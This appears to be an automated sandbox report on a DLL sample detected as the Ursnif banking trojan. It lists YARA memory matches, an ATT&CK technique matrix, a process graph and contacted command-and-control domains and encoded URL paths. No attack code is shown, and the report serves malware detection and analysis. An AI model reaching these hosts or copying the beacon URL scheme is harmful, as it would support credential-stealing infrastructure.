                      Source: Yara matchFile source: 00000003.00000003.477283953.0000000004C38000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.484141352.0000000003598000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.477436654.0000000004C38000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.478270609.0000000004C38000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.619486334.000000000321F000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.528112034.000000000341B000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.567583094.00000000049BD000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000002.776401255.0000000004840000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.521826421.0000000004ABB000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.484353267.0000000003598000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.477363484.0000000004C38000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.477795801.0000000004C38000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.484300889.0000000003598000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.477552233.0000000004C38000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.576475056.000000000331D000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.483984504.0000000003598000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.484055425.0000000003598000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.477498453.0000000004C38000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.484848144.0000000003598000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.477873003.0000000004C38000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.774526618.00000000031A0000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.612038120.00000000048BF000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: loaddll32.exe PID: 4668, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: rundll32.exe PID: 4712, type: MEMORYSTR
                      Source: Yara matchFile source: 3.3.rundll32.exe.70a31a.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.3.loaddll32.exe.caa31a.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.2.rundll32.exe.810000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.loaddll32.exe.30794a0.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.3.rundll32.exe.70a31a.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.loaddll32.exe.30794a0.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 4.2.rundll32.exe.6e4c0000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 4.0.rundll32.exe.6e4c0000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.2.rundll32.exe.45794a0.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.2.rundll32.exe.45794a0.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 6.3.rundll32.exe.33ba31a.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 6.3.rundll32.exe.33ba31a.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 2.3.rundll32.exe.30da31a.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.3.loaddll32.exe.caa31a.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 4.0.rundll32.exe.6e4c0000.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.loaddll32.exe.c70000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 2.3.rundll32.exe.30da31a.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 4.3.rundll32.exe.64a31a.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 4.3.rundll32.exe.64a31a.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.2.rundll32.exe.6e4c0000.2.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.loaddll32.exe.6e4c0000.2.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000006.00000003.427656191.00000000033B0000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000003.391175894.00000000030D0000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.432941083.0000000000CA0000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.774318149.0000000003079000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000004.00000003.421383177.0000000000640000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000002.776217854.0000000004579000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.389669380.0000000000700000.00000040.00000001.sdmp, type: MEMORY

                      Mitre Att&ck Matrix

                      Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
                      Valid AccountsWindows Management Instrumentation2Path InterceptionProcess Injection112Virtualization/Sandbox Evasion1Input Capture1System Time Discovery2Remote ServicesInput Capture1Exfiltration Over Other Network MediumEncrypted Channel11Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
                      Default AccountsNative API1Boot or Logon Initialization ScriptsBoot or Logon Initialization ScriptsProcess Injection112LSASS MemorySecurity Software Discovery21Remote Desktop ProtocolArchive Collected Data1Exfiltration Over BluetoothIngress Tool Transfer3Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
                      Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)Deobfuscate/Decode Files or Information1Security Account ManagerVirtualization/Sandbox Evasion1SMB/Windows Admin SharesData from Network Shared DriveAutomated ExfiltrationNon-Application Layer Protocol3Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
                      Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)Obfuscated Files or Information2NTDSProcess Discovery1Distributed Component Object ModelInput CaptureScheduled TransferApplication Layer Protocol14SIM Card SwapCarrier Billing Fraud
                      Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptRundll321LSA SecretsRemote System Discovery1SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
                      Replication Through Removable MediaLaunchdRc.commonRc.commonSteganographyCached Domain CredentialsSystem Information Discovery13VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features

                      Behavior Graph

                      Hide Legend

                      Legend:

                      • Process
                      • Signature
                      • Created File
                      • DNS/IP Info
                      • Is Dropped
                      • Is Windows Process
                      • Number of created Registry Values
                      • Number of created Files
                      • Visual Basic
                      • Delphi
                      • Java
                      • .Net C# or VB.NET
                      • C, C++ or other language
                      • Is malicious
                      • Internet
                      behaviorgraph top1 signatures2 2 Behavior Graph ID: 500309 Sample: 6yDD19jMIu.dll Startdate: 11/10/2021 Architecture: WINDOWS Score: 96 42 Multi AV Scanner detection for domain / URL 2->42 44 Found malware configuration 2->44 46 Multi AV Scanner detection for submitted file 2->46 48 Yara detected  Ursnif 2->48 7 loaddll32.exe 1 2->7         started        process3 dnsIp4 36 breuranel.website 7->36 38 areuranel.website 7->38 40 11 other IPs or domains 7->40 52 Writes or reads registry keys via WMI 7->52 54 Writes registry values via WMI 7->54 11 rundll32.exe 7->11         started        14 cmd.exe 1 7->14         started        16 rundll32.exe 7->16         started        18 rundll32.exe 7->18         started        signatures5 process6 signatures7 56 System process connects to network (likely due to code injection or exploit) 11->56 58 Writes registry values via WMI 11->58 20 WerFault.exe 23 9 11->20         started        22 rundll32.exe 14->22         started        26 WerFault.exe 9 16->26         started        28 WerFault.exe 2 9 18->28         started        process8 dnsIp9 30 52.97.137.114, 443, 49844 MICROSOFT-CORP-MSN-AS-BLOCKUS United States 22->30 32 52.97.219.162, 443, 49843, 49846 MICROSOFT-CORP-MSN-AS-BLOCKUS United States 22->32 34 12 other IPs or domains 22->34 50 System process connects to network (likely due to code injection or exploit) 22->50 signatures10

                      Screenshots

                      Thumbnails

                      This section contains all screenshots as thumbnails, including those not shown in the slideshow.

                      windows-stand

                      Antivirus, Machine Learning and Genetic Malware Detection

                      Initial Sample

                      SourceDetectionScannerLabelLink
                      6yDD19jMIu.dll9%VirustotalBrowse
                      6yDD19jMIu.dll5%ReversingLabs

                      Dropped Files

                      No Antivirus matches

                      Unpacked PE Files

                      SourceDetectionScannerLabelLinkDownload
                      0.2.loaddll32.exe.c70000.0.unpack100%AviraHEUR/AGEN.1108168Download File
                      3.2.rundll32.exe.810000.0.unpack100%AviraHEUR/AGEN.1108168Download File

                      Domains

                      SourceDetectionScannerLabelLink
                      areuranel.website7%VirustotalBrowse
                      breuranel.website7%VirustotalBrowse

                      URLs

                      SourceDetectionScannerLabelLink
                      https://breuranel.website/liopolo/Gu5CX9rKtqJTGdubC/vfDJzFOCWocD/fyvnSBIy2J4/FhQlzlOfNqSLAT/n_2BCGU50%Avira URL Cloudsafe
                      https://deff.nelreports.net/api/report?cat=msn0%URL Reputationsafe
                      https://breuranel.website/80%Avira URL Cloudsafe
                      https://breuranel.website/X0%Avira URL Cloudsafe
                      https://areuranel.website/7%VirustotalBrowse
                      https://areuranel.website/0%Avira URL Cloudsafe
                      https://breuranel.website/liopolo/VQCuXOMQ58gaep/wQcyE3XNRkOUslXiuIoRn/thqxftgA7_2FvfGU/paR5aKKlYUJw0%Avira URL Cloudsafe
                      https://areuranel.website/liopolo/gPZADesC/LIHFYPg1nfeS6qR4dfr58Og/poTvfxxfV9/7jcxdAxrxlBGvHHC2/KE8j0%Avira URL Cloudsafe
                      https://mem.gfx.ms/meversion/?partner=msn&amp;market=en-us&quot;0%Avira URL Cloudsafe
                      https://breuranel.website/liopolo/oPGaMFzTwbyZJ3jE/9_2B3jdhd0kGHjG/n_2BHWHpJci47et543/_2B6aHUxi/oZM90%Avira URL Cloudsafe

                      Domains and IPs

                      Contacted Domains

                      NameIPActiveMaliciousAntivirus DetectionReputation
                      msn.com
                      13.82.28.61
                      truefalse
                        high
                        outlook.com
                        40.97.161.50
                        truefalse
                          high
                          HHN-efz.ms-acdc.office.com
                          52.97.223.66
                          truefalse
                            high
                            FRA-efz.ms-acdc.office.com
                            40.101.124.210
                            truefalse
                              high
                              www.msn.com
                              unknown
                              unknownfalse
                                high
                                www.outlook.com
                                unknown
                                unknownfalse
                                  high
                                  areuranel.website
                                  unknown
                                  unknowntrueunknown
                                  breuranel.website
                                  unknown
                                  unknowntrueunknown
                                  outlook.office365.com
                                  unknown
                                  unknownfalse
                                    high

                                    Contacted URLs

                                    NameMaliciousAntivirus DetectionReputation
                                    https://outlook.com/signup/liopolo/bJlCFRYLHvFIRqYTrU/8RRkttIEA/t1_2BP9O_2BAm85KU_2B/aSpxz3oD7DS4GgXePzf/ia7vS0WgwZtA22jtnk2sgM/8aNHELsXc5Ipi/BMZNGN2v/65JiDOn3VthO9IJqFpTTW9Q/9POmMR2_2B/F79Rk5g05Py2gD_2B/JwjLpqa35mrg/bt4uvVPD_2F/UqHQdzYFCQmMXc/ZX0Xxi4W.jrefalse
                                      high
                                      https://www.outlook.com/signup/liopolo/xrfnn2_2FjAWwzmSPV2sJmp/tknhXbcO6a/ZAGJ1q_2FdrKNOunT/MWqXv5zFFG9p/by8Zf_2FtJ3/xEG2AHiWNHzGMb/5U7AZq2hWTtx5Gp_2FLrT/Jtvmik5RsI3BKCJG/qiPKwJPTBUSBiQw/RY1j9J90egtogWV_2B/CgPW8RXFg/49h8H9fZxytN8Y5j4Ua3/YD4Lz_2BMKncbFniIjR/do3Cf1aCJb1FbLOESe_2B/MC.jrefalse
                                        high
                                        https://outlook.office365.com/signup/liopolo/HeNOXEGhcO/DJiYgDwUOxUtDS_2F/jyyD8scRCvd_/2FyMxtVOaJ3/wtHE98SGLfSVcY/aYMs8f2LumXTliKvTeXJ_/2BDCwHs2R0k_2FBp/TwUdZVU_2BFy7BU/7Kl_2FOBfWpmXbV5T3/HLfF4XU2w/vHhM4pKHjDGx_2BGh5XJ/k3tEoRB4M6D1Hg77dr2/GhhYGYGyvzjf8tA7M4_2Fz/PcKN.jrefalse
                                          high
                                          https://outlook.office365.com/signup/liopolo/bJlCFRYLHvFIRqYTrU/8RRkttIEA/t1_2BP9O_2BAm85KU_2B/aSpxz3oD7DS4GgXePzf/ia7vS0WgwZtA22jtnk2sgM/8aNHELsXc5Ipi/BMZNGN2v/65JiDOn3VthO9IJqFpTTW9Q/9POmMR2_2B/F79Rk5g05Py2gD_2B/JwjLpqa35mrg/bt4uvVPD_2F/UqHQdzYFCQmMXc/ZX0Xxi4W.jrefalse
                                            high
                                            https://msn.com/mail/liopolo/wy2L0fN2E5PVQV/dJuGUeMmesCePLL0l7Wgt/WGkNYevXDY_2B8SF/CdMZYMX0E7B4luP/Ul2jmINaYu2Q2Tpowu/zFWfPWe10/HWR9Tc92PXi2sPWtdN4v/UdHW73hHNRRgj93MpeR/gAwjHz21J0PRcDvLd3I609/yvRpibRLzjrjt/tNfBhMKC/cc7JRbI6tVdqBgZvAlBLjz4/UmIafwR6sLy9/c9juhd.jrefalse
                                              high
                                              https://outlook.com/signup/liopolo/xrfnn2_2FjAWwzmSPV2sJmp/tknhXbcO6a/ZAGJ1q_2FdrKNOunT/MWqXv5zFFG9p/by8Zf_2FtJ3/xEG2AHiWNHzGMb/5U7AZq2hWTtx5Gp_2FLrT/Jtvmik5RsI3BKCJG/qiPKwJPTBUSBiQw/RY1j9J90egtogWV_2B/CgPW8RXFg/49h8H9fZxytN8Y5j4Ua3/YD4Lz_2BMKncbFniIjR/do3Cf1aCJb1FbLOESe_2B/MC.jrefalse
                                                high
                                                https://www.outlook.com/signup/liopolo/3VnYAYtkPZmdkRft/PhukctoSJxkO8c8/Lye7Mz0DUphRm7HFMS/Ert7vY9a_/2Fh6kZ4AO5iovULa_2Bg/RWwMy2ZM2sR1_2FjWVo/tVrVc9cE14VzsJSo6j4pki/JUlhlBWv0cOdb/WT8dwYTw/fsNrVB4ij0f115XNZnOJrEB/Ph8kPiXFtx/k7Vhu_2FqmJ2l_2BS/kcHYGhIgQQBE/6Lz_2BcD7nm/sGFf8Kc2PZ_2B/1_2F.jrefalse
                                                  high
                                                  https://outlook.office365.com/signup/liopolo/3VnYAYtkPZmdkRft/PhukctoSJxkO8c8/Lye7Mz0DUphRm7HFMS/Ert7vY9a_/2Fh6kZ4AO5iovULa_2Bg/RWwMy2ZM2sR1_2FjWVo/tVrVc9cE14VzsJSo6j4pki/JUlhlBWv0cOdb/WT8dwYTw/fsNrVB4ij0f115XNZnOJrEB/Ph8kPiXFtx/k7Vhu_2FqmJ2l_2BS/kcHYGhIgQQBE/6Lz_2BcD7nm/sGFf8Kc2PZ_2B/1_2F.jrefalse
                                                    high
                                                    https://msn.com/mail/liopolo/ytBZeomNqV/HSfS_2F75u1_2Bgzu/fw3T9nUGqtyA/MnMc49Ew1bU/TR75BNg3t5wK_2/FZ_2BhHpRHjaoiOWsJCdm/IP7BzqL3kfOIwEpd/0v6vAk1XTaQKS4Q/4t76RFSHOBJGuOI3un/dPzfZGf9x/VMluKaNPNp_2BEHsWys0/7w8R7Qn2JCyyYRXwFiA/UZytNi_2F_2BVoKUDorTiy/Fo.jrefalse
                                                      high
                                                      https://www.outlook.com/signup/liopolo/bJlCFRYLHvFIRqYTrU/8RRkttIEA/t1_2BP9O_2BAm85KU_2B/aSpxz3oD7DS4GgXePzf/ia7vS0WgwZtA22jtnk2sgM/8aNHELsXc5Ipi/BMZNGN2v/65JiDOn3VthO9IJqFpTTW9Q/9POmMR2_2B/F79Rk5g05Py2gD_2B/JwjLpqa35mrg/bt4uvVPD_2F/UqHQdzYFCQmMXc/ZX0Xxi4W.jrefalse
                                                        high
                                                        https://msn.com/mail/liopolo/BqQVObz8g5lnocL/rDmP1N8TTzvhY7vp6N/RS6H6xMUu/qA1CfJ9oDnQhRUYDGgyu/MnijqTPatYoqwLU2Gjp/CUGc0n_2BeItdu5kr8poMa/AhSBnyUxBLy2z/WL6kh9Er/V_2FntCaBAYN2Q0pmQz73pS/plPX31iyVH/sliN48qRh7bzwYOXL/_2Bf1goPp5sf/LxXLhBSZnu3/MQi2YcecwkM/9zZah40u0/3pu.jrefalse
                                                          high
                                                          https://outlook.office365.com/signup/liopolo/xrfnn2_2FjAWwzmSPV2sJmp/tknhXbcO6a/ZAGJ1q_2FdrKNOunT/MWqXv5zFFG9p/by8Zf_2FtJ3/xEG2AHiWNHzGMb/5U7AZq2hWTtx5Gp_2FLrT/Jtvmik5RsI3BKCJG/qiPKwJPTBUSBiQw/RY1j9J90egtogWV_2B/CgPW8RXFg/49h8H9fZxytN8Y5j4Ua3/YD4Lz_2BMKncbFniIjR/do3Cf1aCJb1FbLOESe_2B/MC.jrefalse
                                                            high
                                                            https://outlook.com/signup/liopolo/3VnYAYtkPZmdkRft/PhukctoSJxkO8c8/Lye7Mz0DUphRm7HFMS/Ert7vY9a_/2Fh6kZ4AO5iovULa_2Bg/RWwMy2ZM2sR1_2FjWVo/tVrVc9cE14VzsJSo6j4pki/JUlhlBWv0cOdb/WT8dwYTw/fsNrVB4ij0f115XNZnOJrEB/Ph8kPiXFtx/k7Vhu_2FqmJ2l_2BS/kcHYGhIgQQBE/6Lz_2BcD7nm/sGFf8Kc2PZ_2B/1_2F.jrefalse
                                                              high
                                                              https://www.outlook.com/signup/liopolo/HeNOXEGhcO/DJiYgDwUOxUtDS_2F/jyyD8scRCvd_/2FyMxtVOaJ3/wtHE98SGLfSVcY/aYMs8f2LumXTliKvTeXJ_/2BDCwHs2R0k_2FBp/TwUdZVU_2BFy7BU/7Kl_2FOBfWpmXbV5T3/HLfF4XU2w/vHhM4pKHjDGx_2BGh5XJ/k3tEoRB4M6D1Hg77dr2/GhhYGYGyvzjf8tA7M4_2Fz/PcKN.jrefalse
                                                                high
                                                                https://outlook.com/signup/liopolo/HeNOXEGhcO/DJiYgDwUOxUtDS_2F/jyyD8scRCvd_/2FyMxtVOaJ3/wtHE98SGLfSVcY/aYMs8f2LumXTliKvTeXJ_/2BDCwHs2R0k_2FBp/TwUdZVU_2BFy7BU/7Kl_2FOBfWpmXbV5T3/HLfF4XU2w/vHhM4pKHjDGx_2BGh5XJ/k3tEoRB4M6D1Hg77dr2/GhhYGYGyvzjf8tA7M4_2Fz/PcKN.jrefalse
                                                                  high

                                                                  URLs from Memory and Binaries

                                                                  NameSourceMaliciousAntivirus DetectionReputation
                                                                  https://outlook.office365.comloaddll32.exe, 00000000.00000002.769550335.0000000001102000.00000004.00000001.sdmpfalse
                                                                    high
                                                                    https://www.outlook.com/signup/liopolo/bJlCFRYLHvFIRqYTrU/8RRkttIEA/t1_2BP9O_2BAm85KU_2B/aSpxz3oD7DSloaddll32.exe, 00000000.00000002.769550335.0000000001102000.00000004.00000001.sdmpfalse
                                                                      high
                                                                      https://breuranel.website/liopolo/Gu5CX9rKtqJTGdubC/vfDJzFOCWocD/fyvnSBIy2J4/FhQlzlOfNqSLAT/n_2BCGU5loaddll32.exe, 00000000.00000002.769931525.000000000110E000.00000004.00000001.sdmpfalse
                                                                      • Avira URL Cloud: safe
                                                                      unknown
                                                                      https://msn.com/floaddll32.exe, 00000000.00000003.663884041.0000000001176000.00000004.00000001.sdmpfalse
                                                                        high
                                                                        https://msn.com/eloaddll32.exe, 00000000.00000002.768580069.00000000010C7000.00000004.00000020.sdmpfalse
                                                                          high
                                                                          https://www.msn.com/?refurl=%2fmail%2fliopolo%2fBqQVObz8g5lnocL%2frDmP1N8TTzvhY7vp6N%2fRS6H6xMUu%2fqrundll32.exe, 00000003.00000003.657010952.0000000004C3C000.00000004.00000040.sdmpfalse
                                                                            high
                                                                            https://outlook.com/signup/liopolo/HeNOXEGhcO/DJiYgDwUOxUtDS_2F/jyyD8scRCvd_/2FyMxtVOaJ3/wtHE98SGLfSloaddll32.exe, 00000000.00000003.571184163.000000000110E000.00000004.00000001.sdmpfalse
                                                                              high
                                                                              https://www.outlook.com/signup/liopolo/3VnYAYtkPZmdkRft/PhukctoSJxkO8c8/Lye7Mz0DUphRm7HFMS/Ert7vY9a_rundll32.exe, 00000003.00000003.567344794.00000000008EA000.00000004.00000001.sdmpfalse
                                                                                high
                                                                                https://blogs.msn.com/loaddll32.exe, 00000000.00000003.484784411.0000000003519000.00000004.00000040.sdmp, rundll32.exe, 00000003.00000003.477730310.0000000004C38000.00000004.00000040.sdmpfalse
                                                                                  high
                                                                                  https://deff.nelreports.net/api/report?cat=msnrundll32.exe, 00000003.00000003.700093416.0000000000894000.00000004.00000001.sdmp, rundll32.exe, 00000003.00000003.511056929.00000000008E9000.00000004.00000001.sdmp, rundll32.exe, 00000003.00000003.478009497.00000000008E8000.00000004.00000001.sdmpfalse
                                                                                  • URL Reputation: safe
                                                                                  unknown
                                                                                  https://www.msn.com/en-us//api/modules/fetch&quot;loaddll32.exe, 00000000.00000003.484784411.0000000003519000.00000004.00000040.sdmp, loaddll32.exe, 00000000.00000003.484484416.0000000001176000.00000004.00000001.sdmp, loaddll32.exe, 00000000.00000003.663941944.000000000359B000.00000004.00000040.sdmp, loaddll32.exe, 00000000.00000003.484571941.0000000001166000.00000004.00000001.sdmp, loaddll32.exe, 00000000.00000003.663859168.000000000117A000.00000004.00000001.sdmp, rundll32.exe, 00000003.00000003.478128866.0000000004BB9000.00000004.00000040.sdmp, rundll32.exe, 00000003.00000003.656930982.00000000008FF000.00000004.00000001.sdmp, rundll32.exe, 00000003.00000003.478075992.00000000008ED000.00000004.00000001.sdmp, rundll32.exe, 00000003.00000003.657034849.0000000004C3B000.00000004.00000040.sdmpfalse
                                                                                    high
                                                                                    https://outlook.office365.com/signup/liopolo/xrfnn2_2FjAWwzmSPV2sJmp/tknhXbcO6a/ZAGJ1q_2FdrKNOunT/MWrundll32.exe, 00000003.00000003.745980774.00000000008FF000.00000004.00000001.sdmp, rundll32.exe, 00000003.00000002.773684613.0000000000894000.00000004.00000020.sdmpfalse
                                                                                      high
                                                                                      http://ogp.me/ns/fb#loaddll32.exe, 00000000.00000003.484784411.0000000003519000.00000004.00000040.sdmp, loaddll32.exe, 00000000.00000003.484636695.0000000001174000.00000004.00000001.sdmp, rundll32.exe, 00000003.00000003.478128866.0000000004BB9000.00000004.00000040.sdmp, rundll32.exe, 00000003.00000003.656930982.00000000008FF000.00000004.00000001.sdmpfalse
                                                                                        high
                                                                                        https://www.msn.com/&rundll32.exe, 00000003.00000003.700093416.0000000000894000.00000004.00000001.sdmpfalse
                                                                                          high
                                                                                          https://www.msn.com/mail/liopolo/BqQVObz8g5lnocL/rDmP1N8TTzvhY7vp6N/RS6H6xMUu/qA1CfJ9oDnQhRUYDGgyu/Mrundll32.exe, 00000003.00000003.700093416.0000000000894000.00000004.00000001.sdmpfalse
                                                                                            high
                                                                                            https://msn.com/rundll32.exe, 00000003.00000003.511182314.0000000000894000.00000004.00000001.sdmpfalse
                                                                                              high
                                                                                              https://breuranel.website/8rundll32.exe, 00000003.00000003.567432017.0000000000894000.00000004.00000001.sdmpfalse
                                                                                              • Avira URL Cloud: safe
                                                                                              unknown
                                                                                              https://outlook.office365.com/signup/liopolo/bJlCFRYLHvFIRqYTrU/8RRkttIEA/t1_2BP9O_2BAm85KU_2B/aSpxzloaddll32.exe, 00000000.00000002.769931525.000000000110E000.00000004.00000001.sdmp, loaddll32.exe, 00000000.00000003.752826654.000000000110E000.00000004.00000001.sdmpfalse
                                                                                                high
                                                                                                https://outlook.office365.com/loaddll32.exe, 00000000.00000002.769931525.000000000110E000.00000004.00000001.sdmp, rundll32.exe, 00000003.00000003.567432017.0000000000894000.00000004.00000001.sdmpfalse
                                                                                                  high
                                                                                                  https://outlook.com/loaddll32.exe, 00000000.00000003.571505520.000000000112A000.00000004.00000001.sdmpfalse
                                                                                                    high
                                                                                                    https://www.msn.com/mail/liopolo/M47eTWImwyNJIXk/bvBUnXDqSGJkSqnZ1W/IoQdQ6MHW/B7zE09Qn2ChgYQ2HLYH_/2loaddll32.exe, 00000000.00000003.484571941.0000000001166000.00000004.00000001.sdmpfalse
                                                                                                      high
                                                                                                      https://www.outlook.com/signuploaddll32.exe, 00000000.00000002.769931525.000000000110E000.00000004.00000001.sdmpfalse
                                                                                                        high
                                                                                                        https://outlook.office365.com/$rundll32.exe, 00000003.00000003.567432017.0000000000894000.00000004.00000001.sdmpfalse
                                                                                                          high
                                                                                                          https://breuranel.website/Xrundll32.exe, 00000003.00000003.743394786.0000000000894000.00000004.00000001.sdmpfalse
                                                                                                          • Avira URL Cloud: safe
                                                                                                          unknown
                                                                                                          https://areuranel.website/rundll32.exe, 00000003.00000003.611937576.0000000000894000.00000004.00000001.sdmptrue
                                                                                                          • 7%, Virustotal, Browse
                                                                                                          • Avira URL Cloud: safe
                                                                                                          unknown
                                                                                                          https://outlook.office365.com/;rundll32.exe, 00000003.00000003.567432017.0000000000894000.00000004.00000001.sdmpfalse
                                                                                                            high
                                                                                                            https://web.vortex.data.msn.com/collect/v1/t.gif?name=%27Ms.Webi.PageView%27&amp;ver=%272.1%27&amp;aloaddll32.exe, 00000000.00000003.484784411.0000000003519000.00000004.00000040.sdmp, loaddll32.exe, 00000000.00000003.663914997.000000000359C000.00000004.00000040.sdmp, rundll32.exe, 00000003.00000003.478128866.0000000004BB9000.00000004.00000040.sdmp, rundll32.exe, 00000003.00000003.700067622.0000000000889000.00000004.00000001.sdmpfalse
                                                                                                              high
                                                                                                              https://breuranel.website/liopolo/VQCuXOMQ58gaep/wQcyE3XNRkOUslXiuIoRn/thqxftgA7_2FvfGU/paR5aKKlYUJwrundll32.exe, 00000003.00000003.743394786.0000000000894000.00000004.00000001.sdmpfalse
                                                                                                              • Avira URL Cloud: safe
                                                                                                              unknown
                                                                                                              https://outlook.office365.com/Cloaddll32.exe, 00000000.00000002.769931525.000000000110E000.00000004.00000001.sdmpfalse
                                                                                                                high
                                                                                                                https://outlook.office365.com/signup/liopolo/3VnYAYtkPZmdkRft/PhukctoSJxkO8c8/Lye7Mz0DUphRm7HFMS/Ertrundll32.exe, 00000003.00000003.567432017.0000000000894000.00000004.00000001.sdmp, rundll32.exe, 00000003.00000003.567344794.00000000008EA000.00000004.00000001.sdmpfalse
                                                                                                                  high
                                                                                                                  https://www.msn.com/mail/liopolo/wy2L0fN2E5PVQV/dJuGUeMmesCePLL0l7Wgt/WGkNYevXDY_2B8SF/CdMZYMX0E7B4lrundll32.exe, 00000003.00000003.511182314.0000000000894000.00000004.00000001.sdmpfalse
                                                                                                                    high
                                                                                                                    https://www.msn.com/rundll32.exe, 00000003.00000003.511182314.0000000000894000.00000004.00000001.sdmpfalse
                                                                                                                      high
                                                                                                                      https://outlook.office365.com/Qloaddll32.exe, 00000000.00000002.769931525.000000000110E000.00000004.00000001.sdmpfalse
                                                                                                                        high
                                                                                                                        https://msn.com/mail/liopolo/wy2L0fN2E5PVQV/dJuGUeMmesCePLL0l7Wgt/WGkNYevXDY_2B8SF/CdMZYMX0E7B4luP/Urundll32.exe, 00000003.00000003.511136188.0000000000889000.00000004.00000001.sdmpfalse
                                                                                                                          high
                                                                                                                          https://msn.com/mail/liopolo/BqQVObz8g5lnocL/rDmP1N8TTzvhY7vp6N/RS6H6xMUu/qA1CfJ9oDnQhRUYDGgyu/Mnijqrundll32.exe, 00000003.00000003.700093416.0000000000894000.00000004.00000001.sdmpfalse
                                                                                                                            high
                                                                                                                            https://areuranel.website/liopolo/gPZADesC/LIHFYPg1nfeS6qR4dfr58Og/poTvfxxfV9/7jcxdAxrxlBGvHHC2/KE8jrundll32.exe, 00000003.00000003.611937576.0000000000894000.00000004.00000001.sdmptrue
                                                                                                                            • Avira URL Cloud: safe
                                                                                                                            unknown
                                                                                                                            https://www.msn.com/?refurl=%2fmail%2fliopolo%2fytBZeomNqV%2fHSfS_2F75u1_2Bgzu%2ffw3T9nUGqtyA%2fMnMcloaddll32.exe, 00000000.00000003.663914997.000000000359C000.00000004.00000040.sdmpfalse
                                                                                                                              high
                                                                                                                              https://mem.gfx.ms/meversion/?partner=msn&amp;market=en-us&quot;loaddll32.exe, 00000000.00000003.484784411.0000000003519000.00000004.00000040.sdmp, loaddll32.exe, 00000000.00000003.484484416.0000000001176000.00000004.00000001.sdmp, loaddll32.exe, 00000000.00000003.663914997.000000000359C000.00000004.00000040.sdmp, loaddll32.exe, 00000000.00000003.663859168.000000000117A000.00000004.00000001.sdmp, rundll32.exe, 00000003.00000003.478128866.0000000004BB9000.00000004.00000040.sdmp, rundll32.exe, 00000003.00000003.657010952.0000000004C3C000.00000004.00000040.sdmp, rundll32.exe, 00000003.00000003.656854025.0000000000900000.00000004.00000001.sdmp, rundll32.exe, 00000003.00000003.477941064.00000000008F0000.00000004.00000001.sdmpfalse
                                                                                                                              • Avira URL Cloud: safe
